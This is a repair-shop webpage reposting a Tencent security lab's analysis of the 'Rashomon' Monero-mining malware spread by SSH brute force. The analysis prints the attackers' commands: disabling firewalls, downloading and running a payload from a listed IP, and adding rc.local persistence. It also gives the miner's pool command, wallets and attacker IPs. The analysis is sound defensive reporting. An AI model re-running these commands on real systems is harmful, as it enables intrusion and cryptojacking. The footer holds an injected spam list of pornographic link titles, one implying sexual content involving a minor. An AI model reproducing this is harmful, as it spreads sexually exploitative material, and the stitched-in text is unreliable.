錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
門羅幣挖礦新家族「羅生門」

作者: 佚名  日期:2018-10-10 15:57:16   來源: 本站整理

 一、前言
騰訊安全云鼎實驗室通過部署的威脅感知系統捕獲了一批挖礦樣本(具有同源性),是一批可挖取門羅幣(xmr)的挖礦病毒。這批樣本今年5月開始出現,目前各大殺軟對此樣本基本無法有效查殺,騰訊云云鏡第一時間跟進查殺。根據進一步溯源的信息可以推測該挖礦團伙利用被入侵的博彩網站服務器進行病毒傳播。
分析顯示,此挖礦樣本不具有傳播性,總體結構式是 Loader + 挖礦子體,挖礦團伙通過控制的機器進行遠程 SSH 暴力破解并將病毒進行傳播。由于目前能對付此病毒的殺軟極少,且該病毒通過入侵的賭博網站服務器進行病毒傳播、挖礦,讓真相撲朔迷離,云鼎實驗室威脅情報小組將本次門羅幣挖礦新家族命名為「羅生門」。
二、入侵分析
挖礦樣本通過母體釋放挖礦子體,母體是 Loader ,釋放挖礦子體,執行挖礦子體。母體本身不包含 SSH 爆破等蠕蟲動作,子體就是單純的挖礦代碼(加殼變形 UPX)。通過觀測發現,進行 SSH 爆破的主機 IP 較少且固定,可以認定為固定機器,使用工具進行掃描、爆破。通過這種廣撒網的方式,犯罪團伙能收獲不少門羅幣。
攻擊流程圖:

攻擊過程示意:

攻擊日志來源:http://bikewiki.jp:5000/app/2018/07/27/073148-4879.log
母體 Loader 詳細分析:
母體 Loader 的行為包含自啟動和釋放運行文件兩個部分。

自啟動代碼:
在函數 main_Boot 中通過 sed 編輯 rc.local 和 boot.local 來進行自啟動。
釋放文件:

執行文件:

三、病毒子體分析
通過對挖礦樣本進行分析發現,子體是一個加殼后的標準礦機程序,子體加殼也是導致殺軟無法查殺的一個方式。子體加殼為 UPX 變形殼,可以抵抗通用脫殼機的脫殼。手動脫殼后發現為標準挖礦程序(開源礦機程序)。
相關開源項目連接為:https://github.com/sumoprojects/cryptonote-sumokoin-pool

四、礦池分析與統計
據觀測今年5月至9月初,蜜罐捕獲的「羅生門」挖礦病毒累計挖出約12.16個門羅幣,價值約1w人民幣(2018年10月8日,門羅幣價格為114.2USD,合計1388.67美金),算力為8557H/S,大約是皮皮蝦礦池的百分之一算力。從算力上看,這種廣撒網式的傳播,也能有一定的規模。
挖礦樣本執行挖礦的命令如下:
-B -ostratum+tcp://mine.ppxxmr.com:7777-u 41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCM'Qf1FwzqEi-px -k --max-cpu-usage=75
從挖礦命令中可知,挖礦樣本對 CPU 利用率有一定的限制,最大 CPU 使用量為75%。
挖礦樣本針對的礦池地址和門羅幣(xmr)產量如下:

對應的錢包地址為:
錢包地址:
45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT 
45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT
45vKgdPY4M3Lp4RXWccWCBFP7HCtcp718GyGaNVmi58j9rdDX716yz5MKXT2EDjFixgPW8mjnaXvz2cBUpEqVCLKFH1z9Tx
45vKgdPY4M3Lp4RXWccWCBFP7HCtcp718GyGaNVmi58j9rdDX716yz5MKXT2EDjFixgPW8mjnaXvz2cBUpEqVCLKFH1z9Tx
41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCMQf1FwzqEi
45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT
45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT
47xB4pdBngkhgTD1MdF9sidCa6QRXb4gv6qcGkV1TT4XD6LfZPo12CxeX8LCrqpVZm2eN3uAZ1zMQCcPnhWbLoPgNbK8y3Z
41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCMQf1FwzqEi
五、免殺分析
1、檢測效果:
將挖礦樣本在 VirusTotal 中檢測發現,除了 Drweb 可以檢出此樣本,其余殺軟均無法有效檢測此樣本。挖礦病毒5月出現,流行3月有余,VirusTotal 上依然只有1款殺軟可以查殺。
下圖是挖礦樣本在 VirusTotal 中的檢測結果:

2、免殺流程:
基本所有殺軟都無法查殺此病毒,此病毒通過 Go 語言 Loader 和子體加變形 UPX 殼進行免殺,對于 Linux 查殺較為薄弱的殺軟,很容易漏報。
免殺示意圖:

Loader 使用 Go 語言編寫,大量的 Go 語言的庫代碼掩蓋了真正的病毒代碼部分,所以免殺效果較好。2155個 Go 語言庫函數,真正的病毒代碼包含在4個函數中。

六、溯源分析
對這批挖礦樣本進行溯源分析發現,從今年5月開始,發起攻擊的 IP一共有兩個:160.124.67.66、123.249.34.103
另外,樣本下載地址:181.215.242.240、123.249.9.141、 123.249.34.103、58.221.72.157、160.124.48.150
SSH 暴力破解成功后執行的命令有(suSEfirewall的關閉、iptables 的關閉、樣本的下載):
/etc/init.d/iptables stop; 
service iptables stop; 
SuSEfirewall2 stop; 
reSuSEfirewall2 stop;cd/tmp;
wget -chttp://181.215.242.240/armtyu;
chmod 777 armtyu;./armtyu;
echo “cd/tmp/”>>/etc/rc.local;
echo”./armtyu&”>>/etc/rc.local;echo “/etc/init.d/iptablesstop
IP 地址 
服務器地址 
對外開放服務 
其他描述 
181.215.242.240 
美國 
netbios 
ftp、垃圾郵件、僵尸網絡 
160.124.67.66 
中國 香港 
netbios 
mmhongcan168.com、28zuche.com、014o.com、ip28.net、掃描 
160.124.48.150 
中國 香港 
netbios 
ip28.net、掃描 
123.249.9.141 
中國 貴州 
僵尸網絡 
(掃描 IP 和下載 IP  信息表)
表格中 160.124.67.66 是掃描 IP,通過對 IP 信息的圖譜聚類,發現香港的兩臺主機均為一個團伙控制的機器。美國和貴州的機器是入侵得到的機器。

(團伙圖聚類)
上面提到的掃描機器均為賭博網站的機器,曾經的域名mmhongcan168、28zuche 等都是賭博網站。
28zuche:


另一臺香港機器的域名為 himitate.com,也是賭博網站。

兩臺香港主機均為 ip28.net,都可以作為門羅幣(xmr)的挖礦代理主機。 
黑產江湖之黑吃黑:
有人的地方就有江湖,黑產作為互聯網中的法外之地,弱肉強食也是這個不法之地的規則。有做大產業的黑產大佬,也有干一票就走的小團伙,黑吃黑幾乎天天都在上演。
賭博網站和色情網站是黑吃黑中常常被吃的對象,經研究分析可知,眾多賭博網站所在的服務器竟被用來做掃描,各賭博網站之間并沒發現強關聯性,做賭博的團伙同時做挖礦的跨界運營也不是很多,而且整個挖礦金額不高。挖礦團伙若是入侵了賭博網站,利用其作為病毒服務器傳播挖礦病毒,這也不是不可能。
對于美國和貴州的兩臺下載機,根據 threatbook 的情報,這兩臺主機應該是肉雞,如下圖:

第二個掃描地址為:123.249.34.103 
58.221.72.157 
江蘇 
rat 
123.249.34.103 
貴州 
scan 
mdb7.cn 
美國 
bot 
地理位置:
掃描地址 123.249.34.103的實際地址為中國貴州黔西南布依族苗族自治州,相關的情報如下:

相關網站解析過的地址為:
f6ae.com
www.f6ae.com
www.h88049.com
www.h88034.com
h88032.com
www.h88032.com
h88034.com
h88049.com
h5770.com
h88051.com
以上 URL 地址均為賭博網站:

其他的一些情報:
云鼎實驗室威脅情報團隊在網絡上也觀測到這些 IP 的掃描行為,很多日志都有記錄。可以發現這個挖礦樣本的掃描傳播是一種無針對的、廣撒網式的暴力破解傳播模式。



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 久久亚洲精品无码av| 小13箩利洗澡无码视频网站| 亚洲A∨无码一区二区三区| 亚洲国产精品无码久久一区二区| 亚洲中文字幕不卡无码| 日韩精品真人荷官无码| 亚洲中文无码永久免| 亚洲高清无码专区视频| 精品无码人妻一区二区三区品 | 国产AV无码专区亚洲AVJULIA| 无码成A毛片免费| 亚洲va中文字幕无码| 亚洲youwu永久无码精品| 国产av无码专区亚洲av果冻传媒| 人妻少妇看A偷人无码精品视频| 中文人妻无码一区二区三区| 韩国精品一区二区三区无码视频 | 国产精品亚洲а∨无码播放| 国产精品va无码二区| 久久水蜜桃亚洲av无码精品麻豆| 人妻无码中文字幕免费视频蜜桃| 日日摸夜夜添无码AVA片| 无码少妇一区二区性色AV| 无码国模国产在线无码精品国产自在久国产 | 中文字幕韩国三级理论无码 | 孕妇特级毛片WW无码内射| 中文字幕有码无码AV| 亚洲精品人成无码中文毛片| 亚洲熟妇无码av另类vr影视| 人妻系列无码专区无码中出| 亚洲av无码一区二区三区不卡| 亚洲免费日韩无码系列| 无码人妻精品一区二区蜜桃百度| 无码尹人久久相蕉无码| 亚洲av无码片vr一区二区三区| 亚洲精品无码久久久久久久 | 蜜臀亚洲AV无码精品国产午夜.| 亚洲av永久无码天堂网| 无码熟妇人妻av| 无码国产精品久久一区免费 | 伊人久久综合无码成人网|